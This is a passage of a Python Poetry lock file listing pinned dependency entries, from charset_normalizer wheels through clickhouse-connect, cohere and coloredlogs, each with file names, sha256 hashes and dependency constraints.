"charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:34d95638ff3613849f473afc33f65c401a89f3b9528d0d213c7037c398a51296"}, {file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9edbe6a5bf8b56a4a84533ba2b2f489d0046e755c29616ef8830f9e7d9cf5728"}, {file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f6a02a3c7950cafaadcd46a226ad9e12fc9744652cc69f9e5534f98b47f3bbcf"}, {file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:10b8dd31e10f32410751b3430996f9807fc4d1587ca69772e2aa940a82ab571a"}, {file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:edc0202099ea1d82844316604e17d2b175044f9bcb6b398aab781eba957224bd"}, {file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:b891a2f68e09c5ef989007fac11476ed33c5c9994449a4e2c3386529d703dc8b"}, {file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:71ef3b9be10070360f289aea4838c784f8b851be3ba58cf796262b57775c2f14"}, {file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:55602981b2dbf8184c098bc10287e8c245e351cd4fdcad050bd7199d5a8bf514"}, {file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:46fb9970aa5eeca547d7aa0de5d4b124a288b42eaefac677bde805013c95725c"}, {file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:520b7a142d2524f999447b3a0cf95115df81c4f33003c51a6ab637cbda9d0bf4"}, {file = "charset_normalizer-3.3.1-cp312-cp312-win32.whl", hash = "sha256:8ec8ef42c6cd5856a7613dcd1eaf21e5573b2185263d87d27c8edcae33b62a61"}, {file = "charset_normalizer-3.3.1-cp312-cp312-win_amd64.whl", hash = "sha256:baec8148d6b8bd5cee1ae138ba658c71f5b03e0d69d5907703e3e1df96db5e41"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:63a6f59e2d01310f754c270e4a257426fe5a591dc487f1983b3bbe793cf6bac6"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d6bfc32a68bc0933819cfdfe45f9abc3cae3877e1d90aac7259d57e6e0f85b1"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4f3100d86dcd03c03f7e9c3fdb23d92e32abbca07e7c13ebd7ddfbcb06f5991f"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:39b70a6f88eebe239fa775190796d55a33cfb6d36b9ffdd37843f7c4c1b5dc67"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4e12f8ee80aa35e746230a2af83e81bd6b52daa92a8afaef4fea4a2ce9b9f4fa"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b6cefa579e1237ce198619b76eaa148b71894fb0d6bcf9024460f9bf30fd228"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:61f1e3fb621f5420523abb71f5771a204b33c21d31e7d9d86881b2cffe92c47c"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:4f6e2a839f83a6a76854d12dbebde50e4b1afa63e27761549d006fa53e9aa80e"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:1ec937546cad86d0dce5396748bf392bb7b62a9eeb8c66efac60e947697f0e58"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:82ca51ff0fc5b641a2d4e1cc8c5ff108699b7a56d7f3ad6f6da9dbb6f0145b48"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:633968254f8d421e70f91c6ebe71ed0ab140220469cf87a9857e21c16687c034"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-win32.whl", hash = "sha256:c0c72d34e7de5604df0fde3644cc079feee5e55464967d10b24b1de268deceb9"}, {file = "charset_normalizer-3.3.1-cp37-cp37m-win_amd64.whl", hash = "sha256:63accd11149c0f9a99e3bc095bbdb5a464862d77a7e309ad5938fbc8721235ae"}, {file = "charset_normalizer-3.3.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5a3580a4fdc4ac05f9e53c57f965e3594b2f99796231380adb2baaab96e22761"}, {file = "charset_normalizer-3.3.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2465aa50c9299d615d757c1c888bc6fef384b7c4aec81c05a0172b4400f98557"}, {file = "charset_normalizer-3.3.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:cb7cd68814308aade9d0c93c5bd2ade9f9441666f8ba5aa9c2d4b389cb5e2a45"}, {file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:91e43805ccafa0a91831f9cd5443aa34528c0c3f2cc48c4cb3d9a7721053874b"}, {file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:854cc74367180beb327ab9d00f964f6d91da06450b0855cbbb09187bcdb02de5"}, {file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c15070ebf11b8b7fd1bfff7217e9324963c82dbdf6182ff7050519e350e7ad9f"}, {file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2c4c99f98fc3a1835af8179dcc9013f93594d0670e2fa80c83aa36346ee763d2"}, {file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3fb765362688821404ad6cf86772fc54993ec11577cd5a92ac44b4c2ba52155b"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:dced27917823df984fe0c80a5c4ad75cf58df0fbfae890bc08004cd3888922a2"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:a66bcdf19c1a523e41b8e9d53d0cedbfbac2e93c649a2e9502cb26c014d0980c"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:ecd26be9f112c4f96718290c10f4caea6cc798459a3a76636b817a0ed7874e42"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:3f70fd716855cd3b855316b226a1ac8bdb3caf4f7ea96edcccc6f484217c9597"}, {file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:17a866d61259c7de1bdadef418a37755050ddb4b922df8b356503234fff7932c"}, {file = "charset_normalizer-3.3.1-cp38-cp38-win32.whl", hash = "sha256:548eefad783ed787b38cb6f9a574bd8664468cc76d1538215d510a3cd41406cb"}, {file = "charset_normalizer-3.3.1-cp38-cp38-win_amd64.whl", hash = "sha256:45f053a0ece92c734d874861ffe6e3cc92150e32136dd59ab1fb070575189c97"}, {file = "charset_normalizer-3.3.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:bc791ec3fd0c4309a753f95bb6c749ef0d8ea3aea91f07ee1cf06b7b02118f2f"}, {file = "charset_normalizer-3.3.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:0c8c61fb505c7dad1d251c284e712d4e0372cef3b067f7ddf82a7fa82e1e9a93"}, {file = "charset_normalizer-3.3.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:2c092be3885a1b7899cd85ce24acedc1034199d6fca1483fa2c3a35c86e43041"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c2000c54c395d9e5e44c99dc7c20a64dc371f777faf8bae4919ad3e99ce5253e"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4cb50a0335382aac15c31b61d8531bc9bb657cfd848b1d7158009472189f3d62"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c30187840d36d0ba2893bc3271a36a517a717f9fd383a98e2697ee890a37c273"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fe81b35c33772e56f4b6cf62cf4aedc1762ef7162a31e6ac7fe5e40d0149eb67"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d0bf89afcbcf4d1bb2652f6580e5e55a840fdf87384f6063c4a4f0c95e378656"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:06cf46bdff72f58645434d467bf5228080801298fbba19fe268a01b4534467f5"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:3c66df3f41abee950d6638adc7eac4730a306b022570f71dd0bd6ba53503ab57"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:cd805513198304026bd379d1d516afbf6c3c13f4382134a2c526b8b854da1c2e"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:9505dc359edb6a330efcd2be825fdb73ee3e628d9010597aa1aee5aa63442e97"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:31445f38053476a0c4e6d12b047b08ced81e2c7c712e5a1ad97bc913256f91b2"}, {file = "charset_normalizer-3.3.1-cp39-cp39-win32.whl", hash = "sha256:bd28b31730f0e982ace8663d108e01199098432a30a4c410d06fe08fdb9e93f4"}, {file = "charset_normalizer-3.3.1-cp39-cp39-win_amd64.whl", hash = "sha256:555fe186da0068d3354cdf4bbcbc609b0ecae4d04c921cc13e209eece7720727"}, {file = "charset_normalizer-3.3.1-py3-none-any.whl", hash = "sha256:800561453acdecedaac137bf09cd719c7a440b6800ec182f077bb8e7025fb708"}, ] [[package]] name = "clarifai" version = "9.1.0" description = "Clarifai Python Utilities" optional = true python-versions = ">=3.7" files = [ {file = "clarifai-9.1.0-py3-none-any.whl", hash = "sha256:a22b6c34d18067eb6902111bdbd9627dc2b72b743ac50b3f3178dc7663016003"}, {file = "clarifai-9.1.0.tar.gz", hash = "sha256:f6e65fd81a810c4063f23a066ded68306423da1be0bbf61b32c5ef01214f607f"}, ] [package.dependencies] clarifai-grpc = ">=9.1.0" [[package]] name = "clarifai-grpc" version = "9.1.1" description = "Clarifai gRPC API Client" optional = true python-versions = ">=3.6" files = [ {file = "clarifai-grpc-9.1.1.tar.gz", hash = "sha256:d347b64f8d8dcf4dee1c51c5eced3c3f489e3be595ca4c8374323fdf934bae57"}, {file = "clarifai_grpc-9.1.1-py3-none-any.whl", hash = "sha256:84a49e3d4fa57937ab38fb365c535a8ae255acac4666134d188f5dbe10e865ba"}, ] [package.dependencies] googleapis-common-protos = ">=1.53.0" grpcio = ">=1.44.0" protobuf = ">=3.12" requests = ">=2.25.1" [[package]] name = "click" version = "8.1.7" description = "Composable command line interface toolkit" optional = false python-versions = ">=3.7" files = [ {file = "click-8.1.7-py3-none-any.whl", hash = "sha256:ae74fb96c20a0277a1d615f1e4d73c8414f5a98db8b799a7931d1582f3390c28"}, {file = "click-8.1.7.tar.gz", hash = "sha256:ca9853ad459e787e2192211578cc907e7594e294c7ccc834310722b41b9ca6de"}, ] [package.dependencies] colorama = {version = "*", markers = "platform_system == \"Windows\""} [[package]] name = "click-plugins" version = "1.1.1" description = "An extension module for click to enable registering CLI commands via setuptools entry-points." optional = true python-versions = "*" files = [ {file = "click-plugins-1.1.1.tar.gz", hash = "sha256:46ab999744a9d831159c3411bb0c79346d94a444df9a3a3742e9ed63645f264b"}, {file = "click_plugins-1.1.1-py2.py3-none-any.whl", hash = "sha256:5d262006d3222f5057fd81e1623d4443e41dcda5dc815c06b442aa3c02889fc8"}, ] [package.dependencies] click = ">=4.0" [package.extras] dev = ["coveralls", "pytest (>=3.6)", "pytest-cov", "wheel"] [[package]] name = "clickhouse-connect" version = "0.5.25" description = "ClickHouse core driver, SqlAlchemy, and Superset libraries" optional = true python-versions = "~=3.7" files = [ {file = "clickhouse-connect-0.5.25.tar.gz", hash = "sha256:98af3fff571d1069d2c6dd2f4c0feb220fe4c55bd12608e841c842582061982f"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:7c8ec7ca17efe105211e7b1271b49e0f6c3c56846488a14a866712ce497ef5a5"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:da4153d44461535b31f5bf25b79504ba4afa1ed1f03b50fbfc595e34b2b3d2f2"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0cb5ea544cbabefa99ac588e6a452be6b9e896506b306ebc7a4b073fb3237e6f"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0623d7086710f5c9d04327da1a791ffbf519c0f54b25e3584b6eb88f5496c06b"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:243edb0e30fb52e1e9f137519d342e09e5b804e2e4d1b5d9eea6f90875bd8abe"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:182d5f28a24e2d91921dff6d6fedb51f3622088f340847e46ded93c23b10d8c5"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:f6d4d536daf5c0730350cfe1c51dbf0379d07c8272ae288b82fe9a9c47978879"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8918fcd0d14b1ea7d8159a0cef815ec707ec039689f4d4db956b8f4627a48aea"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-win32.whl", hash = "sha256:62819da829bdce30fac58f2266a134b50983f2a9f5808acdde70b0d59e3ed1e1"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-win_amd64.whl", hash = "sha256:219501ab1180475cbb5fbe604344fd13650507e0bc2618a876f209903dd6738d"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ffe69f2242398845111987672552e2af76a13c0770ce00f82ce84d52f5dd5391"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:c701cfc1ae4c9f32aefc9b331224b232b01178ec5692297a827563012b29e2bc"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4d8ecae52e5f4d93b7460fb66c61108b77afc28a39bdd6c31dded22865584ec3"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:95340f5054a697b36fc9d32f34516583d9a1d4b9c6784860a7454f7d27802d4e"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:657aa2624c532dcc465ef517880823d9c4f2732e792ff51bb306cee1abc4c6a6"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:964cae0de1badc2430927398f172da70c6f322266f8ae2509e7cf83f305a38f5"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:0cf33dcb201500cce86c9550f55e0505fa22567ce5314aca01037cf88d139b21"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:ff5e4f2098b5363116ec99c79a8f78a81af95eb80086c3df86713dcebb47a36c"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-win32.whl", hash = "sha256:4792f129593f931609e623c64627b2a6b265fc55083e121e3c4cc800ea65bbb3"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-win_amd64.whl", hash = "sha256:e69421e03ac40c8a5c9f70aca110945b0a7e33843dc415f2305142db9b819941"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:e1c285c3452564e99098cce044ef7f6e2041f70f5557022d0f07886d0c17284a"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f501c4f8d92625b0028f828a317beda621bbd6fd26bddada756f2971b0808618"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0d2bc8636e262a83f9ee8faf0de6562f463f6b431c6a543be6628006640c0065"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b853b146b3557484946c93b4af22834c83ad30908850dc418dd6085b9367bf59"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:4851bb77eba7bbf494b3ee16f71a63cb890947ceddd3d71c2cf5a6635d482987"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:75884207d0e09a9018be29ebe38c0e26be8d0ba96053cc181ee85c15b4ccd18d"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:3d435e98126754ba82e23d20154ff427117227915ee84c7fea43a8d4444daed2"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-win32.whl", hash = "sha256:d900614c8a85c635b45c30d5de37d287cd0b20e44ef1f7f4b83b392bc82696c7"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-win_amd64.whl", hash = "sha256:1c47b203278df80ebd3eccb9087194f35dd666c2d19bca8148dc70d80b94502b"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:6d60ec792e72b26184082ec86d4a32d1503acd6725b02bcb56c2980340129837"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e050e67b9b2ce12ec3e7ce5c27d772e54d06dab578393c0760fd2fd8ea9eae57"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e78c9b398abc683f003ed5d3013f2b35d692b8d1a9f1a40dc41fc9fa29304b58"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:805a0494c8a3f4b37f38b33bdf6daeb43ea4165c3d5916e0467a4811f7a1efc6"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:62e2da6c3971bc3cfec3dc0430318f38d061ffbdd4eb122e616a2f1aafc6e5c9"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b7dbccfc5a7b238c7e927fb159b95f8ab2970ca0fd4ea39c813be4d10d2799cd"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:6b9e4d0367f99471e865af55865fe300ccbf6e1d9fa070e1e0048c0f33d1ac2c"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:f5bf565a45fb52c5b7e9a96913cda4012c1de1407bbab165378e32c6c946bf0d"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-win32.whl", hash = "sha256:a08ead36c61ac28ce44a0f202acbd594e818be7640d6c972a33a1ebae72e6770"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-win_amd64.whl", hash = "sha256:0db04a7433d1616f88eaa33b5c5884f7d367d087774a058712a2a6075ac1b4fb"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:dd7ffbf42a97a4344b82b934d27749fd8296bb18b29a295c249b5d9a774ad122"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b51c174621c1de9ae03acd31fbd258e51a1760ae39b4c9ffbaec4a38e19e1545"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a59d3d84fccfb831b19a96503fcaf1f6387b49f561d38bf3549fe917a372cc68"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8335abab878fb166494bb9e68bb7d14a7325f96fb656d3f77d7a23668fb67a2f"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a0a53d30cc50350efd82ad492a5b5597dedd6b79b19cfd2fe4331eac756f4aeb"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:234579a907e43522c08f1ab9a199d44f7177d7a3755a43669143b237daa026a1"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:93486291893605a0c8884db98e6306f61720fdbe4b1bed5b57cc0daa69cb18c9"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:538025c3e10a387c0fe41b687c3421b98070a7f07d07ca88d7cc0d8aed7650f1"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-win32.whl", hash = "sha256:38051bf7bd6003c0763561214530eef49dc194b062d6bf7faca708f42a5dbf63"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-win_amd64.whl", hash = "sha256:3618a75a1f2c286e808b1d003ee3956bbf2a762ed36fee5f2a3e2e2096fb37ba"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:2170ba71ad154e9af1f09efd6acaf257b8c1346aeaaf57ae9cac7aa5778bff2c"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c846104f4e399e50008324c6ae66c3ef45ac4137a67ccaacdd3afe7f2667b05a"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:697e7c6ea239666aa2695a03787e4fff0c18cb829eb50086f929cf22cc455c7a"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b093fc58104b1afe5f968394acaa9b665746564e1ed0c7d8ee5aea7a7a2331b"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:4b80e15bff634c4d6a895316b73843f41208d9e22e7e0039e417c79ead5ec906"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:ce9cd94d0d9e022e71cd121555f07c28ad2dbda431e1caf2174ce89a9d792151"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9fec43568dd0424deb9dcc74a804addd91f7119367a4ae77796c59656ba22be9"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5c5bdc7895b05f0a64956b6b4a29da3882a9b805e1d9e0025a061c46791674f3"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:00b54674d9af736f828c438776b7f11e80aecc95a3b763971df20d1537942408"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:401aa544255f15d6350934db59e6e0b9f1ddc866ccea41803973579725223aea"}, {file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c0a91e08f8563b8710b03c4a3696ba91fa3b0e475aa964a3169f201243f45d76"}, {file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:af191fc8ecaa544e065257c99cd1d7f49d62c191d23adb78fd34182525ea2f8f"}, {file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ef6cb5437c18e7588d6c3d7f4df6c8cdd883c30f82f8ec4f199cdcea63d189e4"}, {file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d5f84058209fbab8119835d9dd475ca4c3a246263d1965f0e7c624bae020cfad"}, {file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:b0a12c57233c85edd1a03d7bd153ef68b5392d500d8a1cf21de8cb5698c57481"}, ] [package.dependencies] certifi = "*" lz4 = "*" pytz = "*" urllib3 = ">=1.26" zstandard = "*" [package.extras] arrow = ["pyarrow"] numpy = ["numpy"] orjson = ["orjson"] pandas = ["pandas"] sqlalchemy = ["sqlalchemy (>1.3.21,<1.4)"] superset = ["apache-superset (>=1.4.1)"] [[package]] name = "cligj" version = "0.7.2" description = "Click params for commmand line interfaces to GeoJSON" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, <4" files = [ {file = "cligj-0.7.2-py3-none-any.whl", hash = "sha256:c1ca117dbce1fe20a5809dc96f01e1c2840f6dcc939b3ddbb1111bf330ba82df"}, {file = "cligj-0.7.2.tar.gz", hash = "sha256:a4bc13d623356b373c2c27c53dbd9c68cae5d526270bfa71f6c6fa69669c6b27"}, ] [package.dependencies] click = ">=4.0" [package.extras] test = ["pytest-cov"] [[package]] name = "codespell" version = "2.2.6" description = "Codespell" optional = false python-versions = ">=3.8" files = [ {file = "codespell-2.2.6-py3-none-any.whl", hash = "sha256:9ee9a3e5df0990604013ac2a9f22fa8e57669c827124a2e961fe8a1da4cacc07"}, {file = "codespell-2.2.6.tar.gz", hash = "sha256:a8c65d8eb3faa03deabab6b3bbe798bea72e1799c7e9e955d57eca4096abcff9"}, ] [package.extras] dev = ["Pygments", "build", "chardet", "pre-commit", "pytest", "pytest-cov", "pytest-dependency", "ruff", "tomli", "twine"] hard-encoding-detection = ["chardet"] toml = ["tomli"] types = ["chardet (>=5.1.0)", "mypy", "pytest", "pytest-cov", "pytest-dependency"] [[package]] name = "cohere" version = "4.32" description = "" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "cohere-4.32-py3-none-any.whl", hash = "sha256:b5ab3509a34c20d51b246e38eb64adc839c8bc131c41ed92ec3613998df9a8e0"}, {file = "cohere-4.32.tar.gz", hash = "sha256:3807747be984f211dce911c1335bd713af2ac2b70f729678381e6ff6e450e681"}, ] [package.dependencies] aiohttp = ">=3.0,<4.0" backoff = ">=2.0,<3.0" fastavro = {version = "1.8.2", markers = "python_version >= \"3.8\""} importlib_metadata = ">=6.0,<7.0" requests = ">=2.25.0,<3.0.0" urllib3 = ">=1.26,<3" [[package]] name = "colorama" version = "0.4.6" description = "Cross-platform colored terminal text." optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7" files = [ {file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"}, {file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"}, ] [[package]] name = "coloredlogs" version = "15.0.1" description = "Colored terminal output for Python's logging module" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "coloredlogs-15.0.1-py2.py3-none-any.whl", hash = "sha256:612ee75c546f53e92e70049c9dbfcc18c935a2b9a53b66085ce9ef6a6e5c0934"}, {file = "coloredlogs-15.0.1.tar.gz", hash = "sha256:7c991aa71a4577af2f82600d8f8f3a89f936baeaf9b50a9c197da014e5bf16b0"}, ] [package.dependencies] humanfriendly = ">=9.1" 